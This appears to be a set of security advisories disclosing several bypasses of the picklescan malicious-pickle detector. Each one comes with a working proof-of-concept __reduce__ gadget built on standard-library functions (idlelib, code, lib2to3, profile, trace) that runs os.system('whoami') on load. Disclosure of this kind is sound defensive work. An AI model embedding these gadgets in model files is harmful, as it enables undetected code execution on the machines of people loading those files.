Source: ghsa
### Summary
Using `idlelib.calltip.Calltip.fetch_tip`, a function from Python's standard library, to execute code from a malicious pickle file.

### Details
The attack payload executes in the following steps: First, the attacker crafts the payload by invoking the `idlelib.calltip.Calltip.fetch_tip` function from the `__reduce__` method. Then, when the victim checks whether the pickle file is safe using the Picklescan library and the library does not detect any dangerous functions, the victim calls `pickle.load()` on the malicious pickle file, leading to remote code execution.

### PoC
```
class EvilCalltipFetchTip:
    def __reduce__(self):
        from idlelib.calltip import Calltip
        # fetch_tip(expression) -> get_entity(expression) -> eval(expression)
        return Calltip().fetch_tip, ("__import__('os').system('whoami')",)
```

### Impact
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in a pickle file that remains undetected but executes when the pickle file is loaded. ...
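For illustration, a minimal end-to-end sketch of the attack flow described above (not part of the advisory itself, and assuming a CPython install where `idlelib`, and therefore `tkinter`, is importable) serializes the PoC object and loads it back; the shell command runs at load time even though the pickle never references `os.system` directly:

```
import pickle


class EvilCalltipFetchTip:
    def __reduce__(self):
        from idlelib.calltip import Calltip
        # fetch_tip(expression) -> get_entity(expression) -> eval(expression)
        return Calltip().fetch_tip, ("__import__('os').system('whoami')",)


# Attacker side: serialize the gadget. The resulting bytes import
# idlelib.calltip.Calltip rather than os.system, so a scanner keyed on a
# denylist of known-dangerous globals has nothing obvious to flag.
data = pickle.dumps(EvilCalltipFetchTip())

# Victim side: deserializing the "clean" bytes evaluates the embedded
# expression and runs `whoami`.
pickle.loads(data)
```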
### Summary
Using `code.InteractiveInterpreter.runcode`, a function from Python's standard library, to execute code from a malicious pickle file.

### Details
The attack payload executes in the following steps: First, the attacker crafts the payload by invoking the `code.InteractiveInterpreter.runcode` function from the `__reduce__` method. Then, when the victim checks whether the pickle file is safe using the Picklescan library and the library does not detect any dangerous functions, the victim calls `pickle.load()` on the malicious pickle file, leading to remote code execution.

### PoC
```
class EvilCodeRuncode:
    def __reduce__(self):
        from code import InteractiveInterpreter
        # InteractiveInterpreter().runcode(cmd) -> exec(cmd)
        return InteractiveInterpreter().runcode, ("__import__('os').system('whoami')",)
```

### Impact
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in a pickle file that remains undetected but executes when the pickle file is loaded. ...
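The chain noted in the PoC comment can be checked directly: `code.InteractiveInterpreter.runcode` hands its argument to `exec`, so any source string passed to it is executed. A minimal illustrative sketch using only the standard library (the printed message is an arbitrary choice):

```
from code import InteractiveInterpreter

# runcode() passes its argument to exec(), so an attacker-chosen source
# string is executed in the interpreter's namespace.
interp = InteractiveInterpreter()
interp.runcode("import os; print('runcode executed in process', os.getpid())")
```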
### Summary
Using `idlelib.autocomplete.AutoComplete.fetch_completions`, a function from Python's standard library, to execute code from a malicious pickle file.

### Details
The attack payload executes in the following steps: First, the attacker crafts the payload by invoking the `idlelib.autocomplete.AutoComplete.fetch_completions` function from the `__reduce__` method. Then, when the victim checks whether the pickle file is safe using the Picklescan library and the library does not detect any dangerous functions, the victim calls `pickle.load()` on the malicious pickle file, leading to remote code execution.

### PoC
```
class EvilIdlelibAutocompleteFetchCompletions:
    def __reduce__(self):
        from idlelib.autocomplete import AutoComplete, ATTRS
        return AutoComplete().fetch_completions, ("__import__('os').system('whoami')", ATTRS)
```

### Impact
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in a pickle file that remains undetected but executes when the pickle file is loaded. ...
### Summary
Using `idlelib.autocomplete.AutoComplete.get_entity`, a function from Python's standard library, to execute code from a malicious pickle file.

### Details
The attack payload executes in the following steps: First, the attacker crafts the payload by invoking the `idlelib.autocomplete.AutoComplete.get_entity` function from the `__reduce__` method. Then, when the victim checks whether the pickle file is safe using the Picklescan library and the library does not detect any dangerous functions, the victim calls `pickle.load()` on the malicious pickle file, leading to remote code execution.

### PoC
```
class EvilIdlelibAutocompleteGetEntity:
    def __reduce__(self):
        from idlelib.autocomplete import AutoComplete
        return AutoComplete().get_entity, ("__import__('os').system('whoami')",)
```

### Impact
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in a pickle file that remains undetected but executes when the pickle file is loaded. ...
### Summary
Using `idlelib.debugobj.ObjectTreeItem.SetText`, a function from Python's standard library, to execute code from a malicious pickle file.

### Details
The attack payload executes in the following steps: First, the attacker crafts the payload by invoking the `idlelib.debugobj.ObjectTreeItem.SetText` function from the `__reduce__` method. Then, when the victim checks whether the pickle file is safe using the Picklescan library and the library does not detect any dangerous functions, the victim calls `pickle.load()` on the malicious pickle file, leading to remote code execution.

### PoC
```
class EvilDebugobjSetText:
    def __reduce__(self):
        from idlelib.debugobj import ObjectTreeItem
        # ObjectTreeItem(..., setfunction=print).SetText(cmd)
        return ObjectTreeItem("label", None, print).SetText, ("__import__('os').system('whoami')",)
```

### Impact
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in a pickle file that remains undetected but executes when the pickle file is loaded. ...
### Summary
Using `lib2to3.pgen2.grammar.Grammar.loads`, a function from Python's standard library, to execute code from a malicious pickle file.

### Details
The attack payload executes in the following steps: First, the attacker crafts the payload by invoking the `lib2to3.pgen2.grammar.Grammar.loads` function from the `__reduce__` method. Then, when the victim checks whether the pickle file is safe using the Picklescan library and the library does not detect any dangerous functions, the victim calls `pickle.load()` on the malicious pickle file, leading to remote code execution.

### PoC
```
import pickle


class Evil:
    def __reduce__(self):
        import os
        return (os.system, ('whoami',))


class EvilLib2to3Pgen2GrammarLoads:
    def __reduce__(self):
        from lib2to3.pgen2.grammar import Grammar
        payload = pickle.dumps(Evil())
        # payload = b'\x80\x04\x95!\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x06whoami\x94\x85\x94R\x94.'
        return Grammar().loads, (payload,)
```
...
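To see why the nested payload evades scanning (an illustrative aside, assuming a Python version that still ships `lib2to3`; the module is deprecated and removed in recent releases): `Grammar.loads` calls `pickle.loads` on its argument, so the inner pickle that references `os.system` directly appears in the outer file only as an opaque bytes constant. The standard `pickletools` module makes the difference visible without loading anything:

```
import pickle
import pickletools


class Evil:
    def __reduce__(self):
        import os
        return (os.system, ('whoami',))


class EvilLib2to3Pgen2GrammarLoads:
    def __reduce__(self):
        from lib2to3.pgen2.grammar import Grammar
        # Grammar.loads() calls pickle.loads() on its argument, so the inner
        # pickle is deserialized (and its gadget executed) at load time.
        return Grammar().loads, (pickle.dumps(Evil()),)


inner = pickle.dumps(Evil())
outer = pickle.dumps(EvilLib2to3Pgen2GrammarLoads())

# The inner pickle imports os.system directly and is easy to flag...
pickletools.dis(inner)
# ...while in the outer pickle those same bytes are only an inert constant;
# the dangerous import never appears as a global of the outer stream.
pickletools.dis(outer)
```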
### Summary
Using `profile.Profile.runctx`, a function from Python's standard library, to execute code from a malicious pickle file.

### Details
The attack payload executes in the following steps: First, the attacker crafts the payload by invoking the `profile.Profile.runctx` function from the `__reduce__` method. Then, when the victim checks whether the pickle file is safe using the Picklescan library and the library does not detect any dangerous functions, the victim calls `pickle.load()` on the malicious pickle file, leading to remote code execution.

### PoC
```
class EvilProfileRunctx:
    def __reduce__(self):
        from profile import Profile
        payload = "__import__('os').system('whoami')"
        return Profile.runctx, (Profile(), payload, {}, {})
```

### Impact
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in a pickle file that remains undetected but executes when the pickle file is loaded. ...
### Summary
Using `profile.Profile.run`, a function from Python's standard library, to execute code from a malicious pickle file.

### Details
The attack payload executes in the following steps: First, the attacker crafts the payload by invoking the `profile.Profile.run` function from the `__reduce__` method. Then, when the victim checks whether the pickle file is safe using the Picklescan library and the library does not detect any dangerous functions, the victim calls `pickle.load()` on the malicious pickle file, leading to remote code execution.

### PoC
```
class EvilProfileRun:
    def __reduce__(self):
        from profile import Profile
        payload = "__import__('os').system('whoami')"
        return Profile.run, (Profile(), payload)
```

### Impact
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in a pickle file that remains undetected but executes when the pickle file is loaded. ...
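As a brief illustrative note on why this gadget works: `profile.Profile.run(cmd)` forwards `cmd` to `runctx`, which ultimately `exec`s it. The PoC returns the unbound `Profile.run` together with a fresh `Profile()` instance as its first argument, which the unpickler then calls just as if it were `Profile().run(payload)`. A minimal sketch with a harmless payload:

```
from profile import Profile

payload = "print('executed via Profile.run')"

# Equivalent to Profile().run(payload): run() delegates to runctx(), which
# exec()s the command string under the profiler, so the string executes.
Profile.run(Profile(), payload)
```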
### Summary
Using `trace.Trace.runctx`, a function from Python's standard library, to execute code from a malicious pickle file.

### Details
The attack payload executes in the following steps: First, the attacker crafts the payload by invoking the `trace.Trace.runctx` function from the `__reduce__` method. Then, when the victim checks whether the pickle file is safe using the Picklescan library and the library does not detect any dangerous functions, the victim calls `pickle.load()` on the malicious pickle file, leading to remote code execution.

### PoC
```
class EvilTraceRunctx:
    def __reduce__(self):
        from trace import Trace
        payload = "__import__('os').system('whoami')"
        return Trace.runctx, (Trace(), payload, {}, {})
```

### Impact
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in a pickle file that remains undetected but executes when the pickle file is loaded. ...
### Summary
Using `trace.Trace.run`, a function from Python's standard library, to execute code from a malicious pickle file.

### Details
The attack payload executes in the following steps: First, the attacker crafts the payload by invoking the `trace.Trace.run` function from the `__reduce__` method. Then, when the victim checks whether the pickle file is safe using the Picklescan library and the library does not detect any dangerous functions, the victim calls `pickle.load()` on the malicious pickle file, leading to remote code execution.

### PoC
```
class EvilTraceRun:
    def __reduce__(self):
        from trace import Trace
        payload = "__import__('os').system('whoami')"
        return Trace.run, (Trace(), payload)
```

### Impact
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in a pickle file that remains undetected but executes when the pickle file is loaded. Supply Chain ...
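The evasion is also visible at the opcode level (an illustrative sketch, not taken from the advisory): in the serialized gadget the imported globals point at the `trace` module rather than at `os.system`, and the shell command exists only as an inert string constant, which is why a scanner keyed on known-dangerous globals reports nothing. The standard `pickletools` module can inspect the stream without loading it:

```
import pickle
import pickletools


class EvilTraceRun:
    def __reduce__(self):
        from trace import Trace
        payload = "__import__('os').system('whoami')"
        return Trace.run, (Trace(), payload)


data = pickle.dumps(EvilTraceRun())

# Dump the opcode stream: the globals reference the trace module (plus
# builtins such as getattr used to rebuild the object), while the command
# to be executed is only a string argument, so nothing in the stream
# matches a denylist of dangerous imports.
pickletools.dis(data)
```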